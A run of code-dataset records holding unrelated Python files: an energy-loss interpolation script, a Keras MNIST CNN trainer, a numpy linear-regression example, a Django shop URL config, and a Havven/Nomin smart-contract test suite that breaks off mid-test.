0\n\nfor i in range(1):\n throttle = 1 # i*(0.1) # just want to analyse the case of box @ l.f\n \n interpolated = []\n \n load = throttle*np.average(power)\n \n # if 30 minute data change 10--> 30\n # energy should remain unaffected\n \n lossy = []\n avg_line = []\n \n for i in range(len(power)-29):\n for j in range(30):\n avg_line.append(power[i])\n # have it so random fluctuation is centred on previous point\n a = power[i+j] + np.random.normal(loc=0,scale=sigma) \n if a > 0:\n if 1 > a:\n interpolated.append(a)\n if power[i]>load:\n if a < load:\n lossy.append((load-a)*(1/60))\n else:\n lossy.append(0)\n if load >= power[i]:\n if a > load:\n lossy.append((1/60)*(a - load))\n else:\n lossy.append(0)\n else:\n a=1\n interpolated.append(a)\n if power[i]>load:\n if a < load:\n lossy.append((load-a)*(1/60))\n else:\n lossy.append(0)\n if load >= power[i]:\n if a > load:\n lossy.append((1/60)*(a - load))\n else:\n lossy.append(0)\n \n else:\n interpolated.append(0)\n lossy.append(0)\n \n lost_E = sum(lossy)*max_power # kWh\n print(\"lost Energy: {0:.2f} kWh\".format(lost_E))\n # checking energy conservation\n \n energy_interpolated = sum(interpolated)*(1/60)*max_power # kWh\n energy_data = (1/2)*sum(power)*max_power # kWh\n \n print(\"lost Energy: {0:.2f} %\".format(100*lost_E/energy_data))\n print(\"Energy Conservation Violated by {0:.2f} %\".format(100*(energy_interpolated-energy_data)/(energy_data)))\n \n throttle_a.append(throttle)\n loss_a.append(100*lost_E/energy_data)\n energy_vio_a.append(100*(energy_interpolated-energy_data)/(energy_data))\n \n if throttle == 1:\n power_g = power[0:3]\n interpolated_g = interpolated[0:61] # check this\n avg_line_g = avg_line[0:61]\n \n loss_at_load_factor = 100*lost_E/energy_data # loss when IT sized at average power\n \n plt.figure()\n plt.title(\"Interpolation of 1-minute Points\")\n plt.plot(np.linspace(0, len(interpolated_g),num=len(interpolated_g),endpoint=False), interpolated_g, label=\"interpolated points\")\n plt.plot(np.linspace(0, len(interpolated_g),num=len(interpolated_g),endpoint=False), avg_line_g, label=\"cumulative average power points\")\n plt.scatter(np.linspace(0, 30*len(power_g),num=len(power_g),endpoint=False), power_g, label=\"inferred average power from data\")\n plt.legend()\n plt.xlabel(\"Time Elapsed (min)\")\n plt.ylabel(\"Power Fraction of Rated Capacity\")\n plt.savefig(\"interpolation_example.pdf\")\n plt.show()\n \n energy_t_interpolated = np.log((1/60)*np.cumsum(interpolated)*max_power)\n energy_t_data = np.log((1/2)*np.cumsum(power)*max_power )\n \n plt.figure()\n plt.title(\"Log of Cumulative Energy for Interpolated and Real Data\")\n plt.ylabel(r\"ln( Energy/[kWh] )\")\n plt.xlabel(\"Time Elapsed (min)\")\n plt.plot(np.linspace(0, len(energy_t_interpolated),num=len(energy_t_interpolated),endpoint=False), energy_t_interpolated)\n plt.plot(np.linspace(0, 30*len(energy_t_data),num=len(energy_t_data),endpoint=False), energy_t_data)\n plt.savefig(\"energy_cons.pdf\")\n else:\n pass\n\n# zero loss when IT = 0\n\nloss_a[0]=0\n\nplt.figure()\nplt.plot(throttle_a,loss_a)\nplt.title(\"Percentage Energy Loss as a funciton of IT Sizing\")\nplt.ylabel(r\"Percentage Energy Loss (%)\")\nplt.xlabel(\"IT sizing as a Fraction of Annual Average Power\")\nplt.savefig(\"loss_load.pdf\")\n\"\"\"\n\n","sub_path":"monthly_aggregation_loss.py","file_name":"monthly_aggregation_loss.py","file_ext":"py","file_size_in_byte":7491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"487278542","text":"import cv2\nimport keras\nimport tensorflow as tf\nfrom keras.datasets import mnist, cifar10\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Activation, Flatten\nfrom keras.layers import Conv2D, MaxPooling2D, AveragePooling2D\nfrom keras.models import load_model\nfrom keras.callbacks import ModelCheckpoint\nfrom keras.optimizers import Adam\nfrom keras.losses import categorical_crossentropy\nimport os\nfrom time import time\nimport numpy as np\n\nimport sys\nsys.path.append('../')\n\nfrom utils import show_history, rgb2gray, bgr2gray, save\n\nuse_mnist = True\n\nname = \"mnist\" if use_mnist else \"cifar10\"\nbatch_size = 16\nnum_classes = 10\nepochs = 5\ndir_save = os.path.join(os.getcwd(), 'models')\ntrain = True\n\nprint(\"Dataset in use: \", name.upper())\n\n# Loading test and training datasets\nif use_mnist:\n (x_train, y_train), (x_test, y_test) = mnist.load_data()\n print(x_train.shape)\n x_train = np.reshape(x_train, np.append(x_train.shape, (1)))\n print(x_train.shape)\n x_test = np.reshape(x_test, np.append(x_test.shape, (1)))\nelse:\n (x_train, y_train), (x_test, y_test) = cifar10.load_data()\n\nsave(name + \"_train.jpg\", cv2.hconcat([x_train[0], x_train[1], x_train[2], x_train[3], x_train[4]]))\nsave(name + \"_test.jpg\", cv2.hconcat([x_test[0], x_test[1], x_test[2], x_test[3], x_test[4]]))\nprint('X Train', x_train.shape, ' - X Test', x_test.shape)\nprint('Y Train', y_train.shape, ' - Y Test', y_test.shape)\nprint('First 5 labels, train:', y_train[0], y_train[1], y_train[2], y_train[3], y_train[4])\nprint('First 5 labels, test:', y_test[0], y_test[1], y_test[2], y_test[3], y_test[4])\ny_train = keras.utils.to_categorical(y_train, num_classes)\ny_test = keras.utils.to_categorical(y_test, num_classes)\n\n\nmodel_name = name + \".h5\"\ncheckpoint = ModelCheckpoint(model_name, monitor='val_loss', mode='min', verbose=1, save_best_only=True)\n\n\ndef create_model_1():\n model = Sequential()\n # Convolutional layers\n model.add(Conv2D(64, (7, 7), input_shape=x_train.shape[1:], activation='relu'))\n model.add(MaxPooling2D())\n\n model.add(Conv2D(filters=128, kernel_size=(5,5), padding=\"same\"))\n model.add(MaxPooling2D())\n\n model.add(Conv2D(filters=192, kernel_size=(3,3), strides=(1,1), padding=\"same\", activation = \"relu\"))\n model.add(Conv2D(filters=128, kernel_size=(3,3), strides=(1,1), padding=\"same\", activation = \"relu\"))\n\n model.add(MaxPooling2D(pool_size=(3,3), strides=(2,2), padding=\"valid\"))\n\n # Fully Connected layers\n model.add(Flatten())\n model.add(Dense(units = 1024, activation = \"relu\"))\n model.add(Dense(units = 256, activation = \"relu\"))\n\n\n model.add(Dense(num_classes))\n model.add(Activation('softmax'))\n\n return model\n\ndef create_model_2_lenet():\n model = Sequential()\n # Convolutional layers\n\n model.add(Conv2D(filters=6, kernel_size=(5, 5), activation='relu', padding='same', input_shape=x_train.shape[1:]))\n model.add(MaxPooling2D())\n\n model.add(Conv2D(filters=16, kernel_size=(5, 5), activation='relu'))\n model.add(MaxPooling2D())\n\n # Fully Connected layers\n model.add(Flatten())\n model.add(Dense(units=120, activation='relu'))\n model.add(Dense(units=84, activation='relu'))\n model.add(Dense(units=num_classes, activation='softmax'))\n\n return model\n\ndef create_model_2_lenet_bigger():\n model = Sequential()\n # Convolutional layers\n model.add(Conv2D(filters=64, kernel_size=(3, 3), activation='relu', input_shape=x_train.shape[1:]))\n model.add(AveragePooling2D())\n\n model.add(Conv2D(filters=256, kernel_size=(3, 3), activation='relu'))\n model.add(AveragePooling2D())\n\n # Fully Connected layers\n model.add(Flatten())\n model.add(Dense(units=512, activation='relu'))\n model.add(Dense(units=256, activation='relu'))\n model.add(Dense(units=num_classes, activation = 'softmax'))\n\n return model\n\n\nif train:\n model = create_model_2_lenet()\n model.summary()\n opt = Adam()\n\n model.compile(loss=categorical_crossentropy, optimizer=opt, metrics=['accuracy'])\n start = time()\n history_object = model.fit(x_train, y_train, batch_size=batch_size, epochs=epochs, validation_data=(x_test, y_test), shuffle=True, callbacks=[checkpoint])\n print(\"Training time:\", time()-start)\n\n show_history(history_object)\nelse:\n model = load_model(os.path.join(dir_save, model_name))\n model.summary()\n print(\"H5 Output: \" + str(model.output.op.name))\n print(\"H5 Input: \" + str(model.input.op.name))\n\n # Score trained model.\n scores = model.evaluate(x_test, y_test, verbose=1)\n print('Validation loss:', scores[0])\n print('Validation accuracy:', scores[1])\n\n\n","sub_path":"Chapter4/01_cnn.py","file_name":"01_cnn.py","file_ext":"py","file_size_in_byte":4693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"354643391","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ndata_ = np.genfromtxt(\"data.csv\", delimiter=\",\")\n# 增加维度\n# 样本\nx_data = data_[:, 0, np.newaxis]\n# 标签\ny_data = data_[:, 1, np.newaxis]\n\n# plt.scatter(x_data, y_data)\n# plt.show()\n\n# print(np.mat(x_data).shape)\n# => np.mat => 转换成多行一列的矩阵\n\n# np.ones((100, 1))\n# => 构造二维np数组,100行1列,元素值均为1\n\n# y = a + b*x1 + c*x2 ... => y = a*x0 + b*x1 + c*x2 ...\n# x0 为 1\n\n# 给样本添加 x0\nX_data = np.concatenate((np.ones((len(x_data), 1)), x_data), axis=1)\n\n\n# np.concatenate\n# => 100行1列 100行1列 => 100行2列\n# => axis 为需要合并的位置\n# print(X_data.shape)\n\n\n# 标准方程法求解回归参数\ndef weights(xArr, yArr):\n # 转换成矩阵\n xMat = np.mat(xArr)\n yMat = np.mat(yArr)\n # 矩阵乘法\n xTx = xMat.T * xMat\n\n if np.linalg.det(xTx) == 0.0:\n print(\"np.linalg.det(xTx) == 0.0 !!!\")\n return None\n return xTx.I * xMat.T * yMat\n\n\nws = weights(X_data, y_data)\nx_test = np.array([[0], [1]])\ny_test = ws[0] + x_test * ws[1]\nplt.plot(x_data, y_data, 'b.')\nplt.plot(x_test, y_test, 'r')\nplt.show()\n","sub_path":"p15/test01.py","file_name":"test01.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"59500559","text":"from django.urls import path\nfrom . import views\n\nhandler404 = views.handler404\nhandler500 = views.handler500\nhandler403 = views.handler403\nhandler400 = views.handler400\n\nurlpatterns = [\n\n # Core Views\n path('', views.index_view, name='home'),\n path('contact/', views.contact_view, name='contact'),\n path('faq/', views.faq_view, name='faq'),\n path('about/', views.about_view, name='about'),\n path('terms/', views.terms_view, name='terms'),\n\n # Shop Views\n path('mystery/', views.mystery_view, name='mystery'),\n path('shop/', views.shop_view, name='shop'),\n path('shop/quick_search/', views.quick_search, name='shop_quick_search'),\n path('cart/', views.cart_view, name='cart'),\n path('checkout/', views.checkout_view, name='checkout'),\n path('payment/', views.payment_view, name='payment'),\n path('payment_error/', views.payment_error_view, name='payment_error'),\n path('product//', views.product_view, name='product'),\n path('add_to_mystery/', views.add_to_mystery,\n name='add_to_cart_mystery'),\n path('remove_from_mystery/', views.remove_from_mystery,\n name='remove_from_mystery'),\n path('add_to_cart//', views.add_to_cart, name='add_to_cart'),\n path('remove_from_cart//', views.remove_from_cart,\n name='remove_from_cart'),\n path('clear_cart/', views.clear_cart, name='clear_cart'),\n\n # data responses\n path('makes/', views.send_vehicle_makes, name='makes'),\n path('models/', views.send_vehicle_models, name='models'),\n path('tyres/', views.get_tyres, name='tyres'),\n \n # Dev views\n path('dev/', views.dev_view, name='dev')\n]\n\n\n\n","sub_path":"core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"479195279","text":"import random\n\nfrom utils.deployutils import (\n W3, UNIT, MASTER, DUMMY,\n mine_txs, mine_tx,\n fresh_accounts, fresh_account,\n attempt_deploy,\n take_snapshot, restore_snapshot,\n fast_forward, to_seconds\n)\nfrom utils.testutils import (\n HavvenTestCase, block_time,\n get_event_data_from_log, generate_topic_event_map,\n ZERO_ADDRESS\n)\nfrom tests.contract_interfaces.havven_interface import PublicHavvenInterface\nfrom tests.contract_interfaces.nomin_interface import PublicNominInterface\n\n\ndef setUpModule():\n print(\"Testing Havven...\")\n print(\"=================\")\n print()\n\n\ndef tearDownModule():\n print()\n print()\n\n\nclass TestHavven(HavvenTestCase):\n def setUp(self):\n self.snapshot = take_snapshot()\n\n def tearDown(self):\n restore_snapshot(self.snapshot)\n\n @classmethod\n def deployContracts(cls):\n print(\"Deployment initiated.\\n\")\n\n sources = [\"tests/contracts/PublicHavven.sol\", \"contracts/Nomin.sol\",\n \"contracts/HavvenEscrow.sol\"]\n\n compiled, cls.event_maps = cls.compileAndMapEvents(sources)\n\n # Deploy contracts\n havven_proxy, _ = attempt_deploy(compiled, 'Proxy', MASTER, [MASTER])\n nomin_proxy, _ = attempt_deploy(compiled, 'Proxy', MASTER, [MASTER])\n proxied_havven = W3.eth.contract(address=havven_proxy.address, abi=compiled['PublicHavven']['abi'])\n proxied_nomin = W3.eth.contract(address=nomin_proxy.address, abi=compiled['Nomin']['abi'])\n\n havven_tokenstate, _ = attempt_deploy(compiled, 'TokenState',\n MASTER, [MASTER, MASTER])\n nomin_tokenstate, _ = attempt_deploy(compiled, 'TokenState',\n MASTER, [MASTER, MASTER])\n havven_contract, hvn_txr = attempt_deploy(compiled, 'PublicHavven', MASTER, [havven_proxy.address, havven_tokenstate.address, MASTER, MASTER, cls.initial_price, [], ZERO_ADDRESS])\n hvn_block = W3.eth.blockNumber\n nomin_contract, nom_txr = attempt_deploy(compiled, 'Nomin',\n MASTER,\n [nomin_proxy.address, nomin_tokenstate.address, havven_contract.address, 0, MASTER])\n escrow_contract, escrow_txr = attempt_deploy(compiled, 'HavvenEscrow',\n MASTER,\n [MASTER, havven_contract.address])\n\n # Hook up each of those contracts to each other\n mine_txs([\n havven_tokenstate.functions.setBalanceOf(havven_contract.address, 100000000 * UNIT).transact({'from': MASTER}),\n havven_tokenstate.functions.setAssociatedContract(havven_contract.address).transact({'from': MASTER}),\n nomin_tokenstate.functions.setAssociatedContract(nomin_contract.address).transact({'from': MASTER}),\n havven_proxy.functions.setTarget(havven_contract.address).transact({'from': MASTER}),\n nomin_proxy.functions.setTarget(nomin_contract.address).transact({'from': MASTER}),\n havven_contract.functions.setNomin(nomin_contract.address).transact({'from': MASTER}),\n nomin_contract.functions.setHavven(havven_contract.address).transact({'from': MASTER}),\n havven_contract.functions.setEscrow(escrow_contract.address).transact({'from': MASTER})\n ])\n\n havven_event_dict = generate_topic_event_map(compiled['PublicHavven']['abi'])\n\n print(\"\\nDeployment complete.\\n\")\n return havven_proxy, proxied_havven, nomin_proxy, proxied_nomin, havven_contract, nomin_contract, escrow_contract, hvn_block, havven_event_dict\n\n @classmethod\n def setUpClass(cls):\n # to avoid overflowing in the negative direction (now - feePeriodDuration * 2)\n fast_forward(weeks=102)\n\n cls.initial_price = UNIT // 2\n\n cls.havven_proxy, cls.proxied_havven, cls.nomin_proxy, cls.proxied_nomin, \\\n cls.havven_contract, cls.nomin_contract, cls.escrow_contract, cls.construction_block, \\\n cls.havven_event_dict = cls.deployContracts()\n\n cls.event_map = cls.event_maps['Havven']\n\n cls.havven = PublicHavvenInterface(cls.proxied_havven, \"Havven\") \n cls.nomin = PublicNominInterface(cls.proxied_nomin, \"Nomin\")\n\n cls.unproxied_havven = PublicHavvenInterface(cls.havven_contract, \"UnproxiedHavven\")\n\n cls.initial_time = cls.havven.lastFeePeriodStartTime()\n cls.time_fast_forwarded = 0\n\n cls.base_havven_price = UNIT\n\n cls.sd_duration = 4 * 7 * 24 * 60 * 60\n\n def havven_updatePrice(self, sender, price, time):\n return mine_tx(self.havven_contract.functions.updatePrice(price, time).transact({'from': sender}), 'updatePrice', 'Havven')\n\n ###\n # Test inherited Owned - Should be the same test_Owned.py\n ###\n def test_owner_is_master(self):\n self.assertEqual(self.havven.owner(), MASTER)\n\n def test_change_owner(self):\n old_owner = self.havven.owner()\n new_owner = DUMMY\n\n self.havven.nominateNewOwner(old_owner, new_owner)\n self.havven.acceptOwnership(new_owner)\n self.assertEqual(self.havven.owner(), new_owner)\n\n # reset back to old owner\n self.havven.nominateNewOwner(new_owner, old_owner)\n self.havven.acceptOwnership(old_owner)\n self.assertEqual(self.havven.owner(), old_owner)\n\n def test_change_invalid_owner(self):\n invalid_account = DUMMY\n self.assertReverts(self.havven.nominateNewOwner, invalid_account, invalid_account)\n\n ###\n # Test inherited ExternStateToken\n ###\n # Constuctor\n def test_ExternStateToken_constructor(self):\n total_supply = 10 ** 8 * UNIT\n self.assertEqual(self.havven.name(), \"Havven\")\n self.assertEqual(self.havven.symbol(), \"HAV\")\n self.assertEqual(self.havven.totalSupply(), total_supply)\n self.assertEqual(self.havven.balanceOf(self.havven_contract.address), total_supply)\n\n # Approval\n def test_approve(self):\n owner = MASTER\n spender = DUMMY\n self.havven.approve(owner, spender, UNIT)\n self.assertEqual(self.havven.allowance(owner, spender), UNIT)\n self.havven.approve(owner, spender, 0)\n self.assertEqual(self.havven.allowance(owner, spender), 0)\n\n #\n ##\n ###\n # Test Havven\n ###\n ###\n # Constructor\n ###\n def test_constructor(self):\n fee_period = self.havven.feePeriodDuration()\n self.assertEqual(fee_period, to_seconds(weeks=4))\n self.assertGreater(block_time(), 2 * fee_period)\n self.assertEqual(self.havven.MIN_FEE_PERIOD_DURATION(), to_seconds(days=1))\n self.assertEqual(self.havven.MAX_FEE_PERIOD_DURATION(), to_seconds(weeks=26))\n self.assertEqual(self.havven.lastFeesCollected(), 0)\n self.assertEqual(self.havven.nomin(), self.nomin_contract.address)\n self.assertEqual(self.havven.escrow(), self.escrow_contract.address)\n self.assertEqual(self.havven.decimals(), 18)\n self.assertEqual(self.havven.feePeriodStartTime(), block_time(self.construction_block))\n self.assertEqual(self.havven.lastFeePeriodStartTime(), block_time(self.construction_block) - fee_period)\n self.assertEqual(self.havven.lastFeesCollected(), 0)\n self.assertEqual(self.havven.price(), self.initial_price)\n\n def test_constructor_migration(self):\n # Ensure issuers list updates issued balances properly... update deploycontracts above.\n sources = [\"tests/contracts/PublicHavven.sol\", \"contracts/Nomin.sol\",\n \"contracts/HavvenEscrow.sol\"]\n\n print()\n compiled, event_maps = self.compileAndMapEvents(sources)\n\n # Initial issued nomin balances\n #issuer_addresses = [f\"0x{'0'*39}{i+1}\" for i in range(10)]\n issuers_all = fresh_accounts(54)\n issuers = issuers_all[:2]\n issuer_balances = [77 * UNIT * i for i in range(10)]\n total_nomins = sum(issuer_balances)\n\n # Deploy contracts\n havven_proxy, _ = attempt_deploy(compiled, 'Proxy', MASTER, [MASTER])\n nomin_proxy, _ = attempt_deploy(compiled, 'Proxy', MASTER, [MASTER])\n proxied_havven = W3.eth.contract(address=havven_proxy.address, abi=compiled['PublicHavven']['abi'])\n proxied_nomin = W3.eth.contract(address=nomin_proxy.address, abi=compiled['Nomin']['abi'])\n\n havven_tokenstate, _ = attempt_deploy(compiled, 'TokenState',\n MASTER, [MASTER, MASTER])\n nomin_tokenstate, _ = attempt_deploy(compiled, 'TokenState',\n MASTER, [MASTER, MASTER])\n havven_contract, hvn_txr = attempt_deploy(compiled, 'PublicHavven', MASTER, [havven_proxy.address, havven_tokenstate.address, MASTER, MASTER, UNIT, [], ZERO_ADDRESS])\n hvn_block = W3.eth.blockNumber\n nomin_contract, nom_txr = attempt_deploy(compiled, 'Nomin',\n MASTER,\n [nomin_proxy.address, nomin_tokenstate.address, havven_contract.address, 0, MASTER])\n escrow_contract, escrow_txr = attempt_deploy(compiled, 'HavvenEscrow',\n MASTER,\n [MASTER, havven_contract.address])\n\n mine_txs([\n havven_tokenstate.functions.setBalanceOf(havven_contract.address, 100000000 * UNIT).transact({'from': MASTER}),\n havven_tokenstate.functions.setAssociatedContract(havven_contract.address).transact({'from': MASTER}),\n nomin_tokenstate.functions.setAssociatedContract(nomin_contract.address).transact({'from': MASTER}),\n havven_proxy.functions.setTarget(havven_contract.address).transact({'from': MASTER}),\n nomin_proxy.functions.setTarget(nomin_contract.address).transact({'from': MASTER}),\n havven_contract.functions.setNomin(nomin_contract.address).transact({'from': MASTER}),\n nomin_contract.functions.setHavven(havven_contract.address).transact({'from': MASTER}),\n havven_contract.functions.setEscrow(escrow_contract.address).transact({'from': MASTER})\n ])\n\n havven_event_dict = generate_topic_event_map(compiled['PublicHavven']['abi'])\n\n havven = PublicHavvenInterface(proxied_havven, \"Havven\") \n nomin = PublicNominInterface(proxied_nomin, \"Nomin\")\n\n for i in range(len(issuers)):\n issuer = issuers[i]\n havven.endow(MASTER, issuer, 1000 * UNIT)\n havven.setIssuer(MASTER, issuer, True)\n mine_txs([havven_contract.functions.updatePrice(UNIT, block_time() + 1).transact({'from': MASTER})])\n havven.issueNomins(issuer, i * 10 * UNIT)\n fast_forward(havven.feePeriodDuration() // 20)\n\n for i in range(len(issuers)):\n issuer = issuers[i]\n havven.endow(MASTER, issuer, 1000 * UNIT)\n havven.setIssuer(MASTER, issuer, True)\n mine_txs([havven_contract.functions.updatePrice(UNIT, block_time() + 1).transact({'from': MASTER})])\n havven.issueNomins(issuer, (len(issuers) - 1 - i) * 5 * UNIT)\n fast_forward(havven.feePeriodDuration() // 15)\n\n new_havven_contract, txr = attempt_deploy(compiled, 'PublicHavven', MASTER, [havven_proxy.address, havven_tokenstate.address, MASTER, MASTER, UNIT, issuers_all, havven_contract.address])\n new_havven = PublicHavvenInterface(new_havven_contract, \"Havven\")\n\n self.assertEqual(havven.totalIssuanceData(), new_havven.totalIssuanceData())\n self.assertEqual(havven.feePeriodStartTime(), new_havven.feePeriodStartTime())\n self.assertEqual(havven.lastFeePeriodStartTime(), new_havven.lastFeePeriodStartTime())\n\n for issuer in issuers:\n self.assertEqual(havven.isIssuer(issuer), new_havven.isIssuer(issuer))\n self.assertEqual(havven.issuanceData(issuer), new_havven.issuanceData(issuer))\n self.assertEqual(havven.nominsIssued(issuer), new_havven.nominsIssued(issuer))\n\n ###\n # Mappings\n ###\n # currentBalanceSum\n def test_currentBalanceSum(self):\n # Testing the value of currentBalanceSum works as intended,\n # Further testing involving this and fee collection will be done\n # in scenario testing\n fee_period = self.havven.feePeriodDuration()\n delay = int(fee_period / 10)\n alice = fresh_account()\n self.assertEqual(self.havven.balanceOf(alice), 0)\n\n start_amt = UNIT * 50\n\n self.havven.endow(MASTER, alice, start_amt)\n self.havven.setIssuer(MASTER, alice, True)\n self.havven_updatePrice(MASTER, UNIT, block_time()+1)\n self.havven.setIssuanceRatio(MASTER, UNIT)\n self.havven.issueNomins(alice, start_amt)\n\n self.assertEqual(self.havven.balanceOf(alice), start_amt)\n self.assertEqual(self.nomin.balanceOf(alice), start_amt)\n self.assertEqual(self.havven.issuanceCurrentBalanceSum(alice), 0)\n start_time = block_time()\n fast_forward(delay)\n self.havven.recomputeLastAverageBalance(alice, alice)\n end_time = block_time()\n balance_sum = (end_time - start_time) * start_amt\n self.assertEqual(\n self.havven.issuanceCurrentBalanceSum(alice),\n balance_sum\n )\n self.havven.burnNomins(alice, start_amt)\n self.assertEqual(self.nomin.balanceOf(alice), 0)\n fast_forward(delay)\n self.havven.recomputeLastAverageBalance(alice, alice)\n self.assertClose(\n self.havven.issuanceCurrentBalanceSum(alice), balance_sum\n )\n\n # lastAverageBalance\n def test_lastAverageBalance(self):\n # set the block time to be at least 30seconds away from the end of the fee_period\n fee_period = self.havven.feePeriodDuration()\n\n # fast forward next block with some extra padding\n delay = fee_period + 1\n fast_forward(delay)\n self.havven.rolloverFeePeriodIfElapsed(DUMMY)\n alice = fresh_account()\n self.assertEqual(self.havven.balanceOf(alice), 0)\n\n start_amt = UNIT * 50\n\n self.havven.endow(MASTER, alice, start_amt)\n self.havven.setIssuer(MASTER, alice, True)\n self.havven_updatePrice(MASTER, UNIT, block_time()+1)\n self.havven.setIssuanceRatio(MASTER, UNIT)\n tx_receipt = self.havven.issueNomins(alice, start_amt)\n\n self.assertEqual(self.havven.balanceOf(alice), start_amt)\n self.assertEqual(self.havven.issuanceCurrentBalanceSum(alice), 0)\n self.assertEqual(self.havven.issuanceLastAverageBalance(alice), 0)\n self.assertEqual(self.havven.issuanceLastModified(alice), block_time(tx_receipt['blockNumber']))\n fast_forward(delay)\n self.havven.rolloverFeePeriodIfElapsed(DUMMY)\n fast_forward(fee_period // 2)\n\n tx_receipt = self.havven.recomputeLastAverageBalance(alice, alice)\n block_number = tx_receipt['blockNumber']\n\n duration_since_rollover = block_time(block_number) - self.havven.feePeriodStartTime()\n balance_sum = duration_since_rollover * start_amt\n\n actual = self.havven.issuanceCurrentBalanceSum(alice)\n expected = balance_sum\n self.assertClose(\n actual, expected\n )\n\n time_remaining = self.havven.feePeriodDuration() + self.havven.feePeriodStartTime() - block_time()\n fast_forward(time_remaining - 5)\n self.havven.burnNomins(alice, start_amt // 2)\n time_remaining = self.havven.feePeriodDuration() + self.havven.feePeriodStartTime() - block_time()\n fast_forward(time_remaining + 10)\n\n self.havven.rolloverFeePeriodIfElapsed(alice)\n self.havven.recomputeLastAverageBalance(alice, alice)\n\n actual = self.havven.issuanceLastAverageBalance(alice)\n expected = (start_amt * delay) // (self.havven.feePeriodStartTime() - self.havven.lastFeePeriodStartTime())\n self.assertClose(\n actual, expected\n )\n\n def test_lastAverageBalanceFullPeriod(self):\n alice = fresh_account()\n self.havven.setIssuer(MASTER, alice, True)\n fee_period = self.havven.feePeriodDuration()\n\n # Alice will initially have 20 havvens\n self.havven.endow(MASTER, alice, 20 * UNIT)\n self.havven.setIssuer(MASTER, alice, True)\n self.havven_updatePrice(MASTER, UNIT, block_time()+1)\n self.havven.setIssuanceRatio(MASTER, UNIT)\n self.havven.issueNomins(alice, 20 * UNIT)\n\n self.assertEqual(self.havven.balanceOf(alice), 20 * UNIT)\n self.assertEqual(self.nomin.balanceOf(alice), 20 * UNIT)\n\n # Fastforward until just before a fee period rolls over.\n time_remaining = self.havven.feePeriodDuration() + self.havven.feePeriodStartTime() - block_time()\n fast_forward(time_remaining + 50)\n tx_receipt = self.havven.rolloverFeePeriodIfElapsed(alice)\n self.havven_updatePrice(MASTER, UNIT, block_time())\n issue_receipt = self.havven.issueNomins(alice, 0) \n\n self.assertEqual(self.havven.issuanceLastModified(alice), block_time(issue_receipt['blockNumber']))\n event = get_event_data_from_log(self.havven_event_dict, tx_receipt.logs[0])\n self.assertEqual(event['event'], 'FeePeriodRollover')\n\n # roll over the full period\n fast_forward(fee_period + 50)\n tx_receipt = self.havven.rolloverFeePeriodIfElapsed(MASTER)\n self.havven_updatePrice(MASTER, UNIT, block_time()+1)\n transfer_receipt = self.havven.issueNomins(alice, 0)\n\n event = get_event_data_from_log(self.havven_event_dict, tx_receipt.logs[0])\n self.assertEqual(event['event'], 'FeePeriodRollover')\n self.assertEqual(self.havven.issuanceLastModified(alice), block_time(transfer_receipt['blockNumber'])) \n self.assertEqual(self.havven.issuanceLastAverageBalance(alice), 20 * UNIT)\n\n # Try a half-and-half period\n time_remaining = self.havven.feePeriodDuration() + self.havven.feePeriodStartTime() - block_time()\n fast_forward(time_remaining + 50)\n self.havven.rolloverFeePeriodIfElapsed(MASTER)\n self.havven.burnNomins(alice, 10 * UNIT)\n\n fast_forward(fee_period // 2 + 10)\n self.havven.burnNomins(alice, 10 * UNIT)\n self.havven.rolloverFeePeriodIfElapsed(MASTER)\n\n fast_forward(fee_period // 2 + 10)\n\n tx_receipt = self.havven.rolloverFeePeriodIfElapsed(MASTER)\n event = get_event_data_from_log(self.havven_event_dict, tx_receipt.logs[0])\n self.assertEqual(event['event'], 'FeePeriodRollover')\n\n self.havven.rolloverFeePeriodIfElapsed(alice)\n self.havven.recomputeLastAverageBalance(alice, alice)\n self.assertClose(self.havven.issuanceLastAverageBalance(alice), 5 * UNIT)\n\n def test_arithmeticSeriesBalance(self):\n alice = fresh_account()\n fee_period = self.havven.feePeriodDuration()\n n = 50\n\n self.havven.endow(MASTER, alice, n * UNIT)\n self.havven_updatePrice(self.havven.oracle(), UNIT, block_time())\n self.havven.setIssuer(MASTER, alice, True)\n self.havven.issueNomins(alice, n * UNIT // 20)\n time_remaining = self.havven.feePeriodDuration() + self.havven.feePeriodStartTime() - block_time()\n fast_forward(time_remaining + 5)\n self.havven.rolloverFeePeriodIfElapsed(MASTER)\n\n for _ in range(n):\n self.havven.burnNomins(alice, UNIT // 20) \n fast_forward(fee_period // n)\n\n fast_forward(n) # fast forward allow the rollover to happen\n self.havven.rolloverFeePeriodIfElapsed(MASTER)\n\n self.havven.recomputeLastAverageBalance(alice, alice)\n self.assertClose(self.havven.issuanceLastAverageBalance(alice), n * (n - 1) * UNIT // (2 * n * 20), precision=3)\n\n def test_averageBalanceSum(self):\n alice, bob, carol = fresh_accounts(3)\n fee_period = self.havven.feePeriodDuration()\n\n self.havven.endow(MASTER, alice, UNIT)\n self.havven.endow(MASTER, bob, UNIT)\n self.havven.endow(MASTER, carol, UNIT)\n\n self.havven.setIssuer(MASTER, alice, True)\n self.havven.setIssuer(MASTER, bob, True)\n self.havven.setIssuer(MASTER, carol, True)\n self.havven.setIssuanceRatio(MASTER, UNIT)\n\n fast_forward(fee_period + 1)\n self.havven.rolloverFeePeriodIfElapsed(DUMMY)\n\n for i in range(10):\n self.havven_updatePrice(MASTER, UNIT, block_time() + 1)\n a_weight = random.random()\n b_weight = random.random()\n c_weight = random.random()\n tot = a_weight + b_weight + c_weight\n\n self.havven.issueNomins(alice, max(1, int(UNIT * a_weight / tot)))\n self.havven.issueNomins(bob, max(1, int(UNIT * b_weight / tot)))\n self.havven.issueNomins(carol, max(1, int(UNIT * c_weight / tot)))\n fast_forward(fee_period // 10 - 1)\n self.havven.burnNomins(alice, max(1, int(UNIT * a_weight / tot)))\n self.havven.burnNomins(bob, max(1, int(UNIT * b_weight / tot)))\n self.havven.burnNomins(carol, max(1, int(UNIT * c_weight / tot)))\n fast_forward(11)\n self.havven.rolloverFeePeriodIfElapsed(MASTER)\n\n self.havven.recomputeLastAverageBalance(alice, alice)\n self.havven.recomputeLastAverageBalance(bob, bob)\n 